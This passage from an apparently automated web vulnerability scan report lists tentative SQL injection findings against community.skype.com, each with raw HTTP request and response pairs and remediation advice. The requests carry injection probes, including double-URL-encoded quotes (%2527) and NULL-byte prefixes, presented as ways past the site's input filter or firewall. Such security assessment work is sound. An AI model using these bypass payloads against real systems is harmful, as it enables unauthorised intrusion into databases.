Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.25. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/ideas

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.26. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/ideas

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/ideas?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:31 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/ideas?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:31 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 48002

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.27. http://community.skype.com/t5/help/faqpage/faq-category-id/kudos [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/kudos

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/kudos HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:37 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 24771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.28. http://community.skype.com/t5/help/faqpage/faq-category-id/participation [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/participation

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/participation%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/participation%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:51 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 44665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.29. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/qa

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/qa HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.30. http://community.skype.com/t5/help/faqpage/faq-category-id/qa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/qa

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/help/faqpage/faq-category-id/qa?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/qa?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:30 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 47701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.31. http://community.skype.com/t5/help/faqpage/faq-category-id/video [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/video

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id/video%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/video%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 44611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.32. http://community.skype.com/t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/iPad%2527/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/iPad%2527%2527/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:50 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.33. http://community.skype.com/t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone/m-p/134130

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone%2527/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/iPad/Trouble-calling-nonskype-phones-from-iPad-and-iPhone%2527%2527/m-p/134130 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:54 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.34. http://community.skype.com/t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/iPhone/A-plan-for-calling-FROM-europe-to-USA/m-p/133998 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.35. http://community.skype.com/t5/iPhone/bd-p/iPhone [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/iPhone/bd-p/iPhone

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/iPhone/bd-p/iPhone?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/iPhone/bd-p/iPhone?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 193713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.36. http://community.skype.com/t5/notifications/notifymoderatorpage/message-uid/25246 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/notifications/notifymoderatorpage/message-uid/25246

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/notifications/notifymoderatorpage/message-uid/25246?1%00'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
